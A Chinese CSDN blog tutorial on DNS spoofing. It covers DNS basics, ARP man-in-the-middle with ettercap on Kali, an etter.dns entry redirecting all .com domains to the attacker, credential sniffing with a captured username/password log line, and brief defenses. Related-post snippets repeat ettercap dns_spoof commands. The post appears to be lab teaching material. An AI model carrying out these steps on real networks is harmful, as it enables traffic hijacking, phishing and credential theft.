DNS欺骗

已于 2023-12-15 17:00:40 修改
阅读量91 收藏 2
点赞数
文章标签: 网络安全
于 2023-12-15 16:58:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liushaojiax/article/details/135020691
版权

一、DNS原理

什么是DNS 域名系统( Domain Name System ),是一种分布式网络目录服务,主要用于域名与 IP 地址的相互转换

DNS特点:分散和分层的机制来实现域名空间的委派授权以及域名与地址相转换的授权

DNS查询请求是层层传递,查询和应答无严格身份验证、会话无加密

收到应答后DNS服务器会缓存结果

二、dns欺骗操作

  1. 首先,确定目标机的ip和网关,攻击机要先冒充目标机的网关,对目标机进行arp欺骗

2.打开kali,输入sudo su 进入root用户

3.输入vim /etc/ettercap/etter.dns ,在配置文件下输入*.com A 192.168.254.128(这是把所有以.com结尾的域名都映射为对应攻击者的ip,在攻击机做中间人后,目标机先访问这里的dns)(A代表ipv4,AAA代表ipv6)

 4.使用工具ettercap:一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。输入ettercap -G ,进入ettercap工具 ,点击对勾(接受)。

拓:MITM是中间人攻击(Man-in-the-middle attack)

 5. 分别点击1(扫描同网段存活主机)和2(存活主机列表),得到Host List

6.如图分别把目标机ip与网关IP加入Target中

7.点击1下的2,即可进行arp欺骗了(感觉这个工具不能造成断网,始终能使目标机连网,但是攻击机已经做了一个中间人)

ettercap mitm方法:

ARP           ARP欺骗

NDP           ipv6协议欺骗技术

ICMP          发送ICMP数据包重定向到kali,然后由kali转发(只有受害者发出的数据包经过kali)

Port Stealing     ARP静态绑定欺骗

DHCP          发送DHCP数据包,让受害者认为kali是路由器,(只有受害者发出的数据包经过kali)

 8.可以看到目标机的网关mac地址已是攻击机的mac地址了

 9.进行如下1-->2-->3-->鼠标左键双击dns_spoof操作,可进行dns欺骗了

 

 10.在目标机ping www.baidu.com ,发现ip为攻击机架设的ip。ettercap工具下方也有欺骗记录

 

 

注意: 如果攻击失败,可以切换虚拟机的网络,我开始时桥接模式没有成功切换成NAT才可以,

也可以设置kali机器的页面,/var/www/html(默认页面时index.html需要打开apache

查看状态service apache2 status,启动apache service apache2 start)

也可以使用ettercap抓取输入的信息:

ettercap:一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。

借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/ 密码等数据以明文的方式进行传输。ettercap几乎是每个渗透测试人员必备的工具之一。

ettercap -Tq -i eth0

-T  文本模式输出,不使用图形用户界面       -q  静默模式

-i  指定要监听的网络接口

启动:ettercap -Tq -i eth0

 访问登录网址,输入用户名及密码。这里我输入zhangsan/123456

返回kali攻击机,查看记录。

HTTP : 118.24.112.177:80 -> USER: zhangsan  PASS: 12345678  INFO: http://a.aixjt.com/AdminPublic.html CONTENT: ajax=1&submitLogin=1&password=12345678&account=zhangsan&verify=3487 

 

  • dns欺骗的危害

输入了正确的域名,访问了错误的服务器

虚假广告

信息窃取(编写一个能够或账号密码的网站)

dns欺骗的防御

DNS服务器:

使用新版本的DNS软件

安全设置对抗DNS欺骗(安全设备)

使用安全技术对DNS数据进行保护

2、应用服务器:

服务证书

用户自主标识(身份认证--账号密码)
 

liushaojiax
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DNShack DNS欺骗工具
05-19
DNShack,用于网络攻防的dns欺骗
DNS欺骗----ettercap工具
河南理工杨轻帆的博客
04-13 662
准备工作:确保试验主机位于同一个局域网,ettercap的配置文件改为0 1. 修改文件 命令 vim /etc/ettercap/etter.dns 然后在文件里添加你的地址映射(如下图) 2. 开始欺骗 开启你的apache然后输入命令开始欺骗 命令 ettercap -i wlan0 -Tq -P dns_spoof -M arp /// /// -T表示使用TCP协议,-q表示使用安静模...
Dns欺骗--Ettercap工具进行Dns欺骗
小人物的博客
04-18 3734
首先,编辑/etc/ettercap/etter.dns,里面有Dns记录,*.ddh.edu.cn  A  10.10.10.10 这个是DNS记录,后面的ip是你想让Dns解析到的ip,能访问到的。其次,就可以进行Dns欺骗攻击了Ettercap -T -q -i eth0(网卡) -P dns_spoof /// ///后面的三个斜杆代表全网段,也就是10.10.10.0/24成功截图觉得挺...
利用Kali Linux的Ettercap工具实施DNS欺骗攻击
热门推荐
yy10992的专栏
11-10 1万+
1 DNS域名系统 DNS即Domain Name System 的缩写,是把主机域名解析IP地址的系统,解决了IP地址难记的问题,用相对好记的域名就可以对服务器进行访问,即使服务器更换了IP地址,我们依旧可以通过域名访问该服务器,这样能够使我们更方便的访问互联网。DNS域名查询请求与回应的过程可简单描述成以下五个步骤:1、网络用户的浏览器提出将域名转换为IP地址的请求;2、地址解析程序reso
Cain嗅探工具的DNS欺骗
田一柠的博客
12-02 825
选中ARP-DNS 添加记录 上面填写要劫持的域名,下面填写要跳转到的地址即可. 经过测试,不是每次都可以成功,不是很稳定
kail linux dns欺骗,Kali Linux渗透测试-Ettercap DNS欺骗攻击-Go语言中文社区
weixin_32201711的博客
05-13 491
Kali Linux渗透测试-Ettercap DNS欺骗攻击DNS欺骗攻击基于中间人攻击攻击者更改受害者从DNS服务器查询的域名解析结果,给受害者发送恶意网页或者钓鱼网页—浏览器依然显示正常的url情形描述:同一局域网内受害者IP 192.168.1.105 Window7攻击者IP 192.168.1.104 kali Linux首先在kali Linux上安装apache服务 启动ap...
使用kali里的dnschef进行DNS欺骗
qq_33163046的博客
06-06 4195
本文使用kali自带的DNSChef工具做DNS欺骗,工具成功生效了
ettercap实现dns欺骗过程
04-13
ettercap是一款功能强大的网络嗅探和中间人攻击工具,尤其在执行DNS欺骗DNS Spoofing)时表现出色。DNS欺骗是一种网络安全攻击手段,通过篡改目标计算机的DNS查询响应,将用户重定向到攻击者控制的恶意网站,从而...
dnschef实现dns欺骗
04-13
DNS欺骗【下】----dnschef实现 https://blog.csdn.net/redwand/article/details/105495873
ettercap实现dns欺骗报文2
04-13
ettercap实现dns欺骗 https://blog.csdn.net/redwand/article/details/105481042
ettercap实现dns欺骗报文1
04-13
DNS欺骗【上】----ettercap实现 https://blog.csdn.net/redwand/article/details/105481042
dns欺骗教程
05-01
### DNS欺骗教程详解 #### 一、DNS欺骗概述 DNS欺骗是一种网络安全攻击手段,通过篡改DNS解析结果来实现对用户访问目标网站的重定向。本教程将详细介绍如何在Windows环境下利用Cain软件进行DNS欺骗攻击,以及背后...
DNS欺骗源代码
04-11
这里提供的"DNS欺骗源代码"是一个实现局域网内DNS欺骗的程序,可以用于学习和理解这种攻击方式。 首先,我们要理解DNS查询和响应的过程。当用户在浏览器中输入一个域名时,本地计算机首先会查询本地DNS缓存,如果...
DNS.rar_DNS欺骗_dns _dns欺骗winpcap_winpcap dns
09-22
在“DNS.rar_DNS欺骗_dns_dns欺骗winpcap_winpcap dns”这个主题中,我们将深入探讨DNS欺骗的概念、工作原理以及如何使用WinPcap进行DNS欺骗DNS欺骗,又称DNS缓存中毒或DNS劫持,是一种网络安全攻击手法,攻击者...
dns欺骗教程含源码
05-01
DNS欺骗,又称DNS缓存中毒或DNS劫持,是一种网络安全攻击手段,通过误导DNS解析来控制用户的网络流量。本教程将深入探讨DNS欺骗的概念、原理以及如何实施,并附带源码,供学习者实践理解。 DNS(Domain Name System...
Kali Linux渗透测试小实践——DNS欺骗
PICACHU+++的博客
12-17 3738
DNS欺骗也称为DNS劫持或重定向,是一种DNS攻击,其中DNS查询被错误地解析,从而意外地将用户重定向到恶意站点。为了进行攻击,犯罪者要么在用户计算机上安装恶意软件,接管路由器,要么拦截或破坏DNS通信。DNS劫持可用于欺骗在这种情况下,攻击者通常显示不需要的广告以产生收入;或用于网络钓鱼,显示用户访问的虚假网站版本并窃取数据或凭据。
DNS欺骗-教程详解
wzhua的博客
08-10 5487
DNS欺骗-教程详解,有环境下载链接
网络安全 中间人攻击-DNS欺骗 使用ettercap
weixin_46067990的博客
04-23 2770
DNS欺骗的艺术 | 域名劫持和网页挂马
尼泊罗河伯的博客
09-26 1792
DNS 全称 Domain Name System ,中文名称为域名系统。DNS 欺骗攻击方篡改域名解析结果,将指向到此域名的IP地址修改为攻击方指定的 IP 地址。因为 DNS 协议存在设计缺陷,在 DNS 报文中只使用一个序列号来进行有效性鉴别,并未提供其它的认证和保护手段,这使得攻击者可以轻松监听到查询请求数据,并伪造 DNS 应答包给 DNS 客户端,从而实现 DNS 欺骗攻击
ettercap+dns欺骗
最新发布
09-16
ettercap是一种开源的网络安全工具,可以用于执行各种网络欺骗攻击,包括DNS欺骗DNS欺骗是一种常见的攻击技术,它允许攻击者篡改网络中的DNS响应,将用户的网络流量重定向到恶意的网站或服务器上。 要使用ettercap进行DNS欺骗,您需要进行以下步骤: 1. 配置ettercap:首先,您需要配置ettercap来监听网络流量并执行攻击。您可以使用ettercap命令行工具或图形界面工具来完成此操作。 2. 扫描网络:使用ettercap扫描网络,找到目标主机和潜在的受害者。这将帮助您确定哪些主机可以进行攻击。 3. 启动DNS欺骗:一旦您找到目标主机和潜在的受害者,您可以使用ettercap来执行DNS欺骗。通过篡改DNS响应,您可以将受害者的流量重定向到您选择的恶意网站或服务器上。 4. 窃听和篡改流量:一旦DNS欺骗成功,ettercap将会窃听受害者的流量,并且您可以选择篡改数据包以执行其他类型的攻击,如中间人攻击或数据包嗅探。 请注意,DNS欺骗是一种违法和不道德的行为,只能在合法的渗透测试或授权的安全评估中使用。未经授权地执行DNS欺骗可能会导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值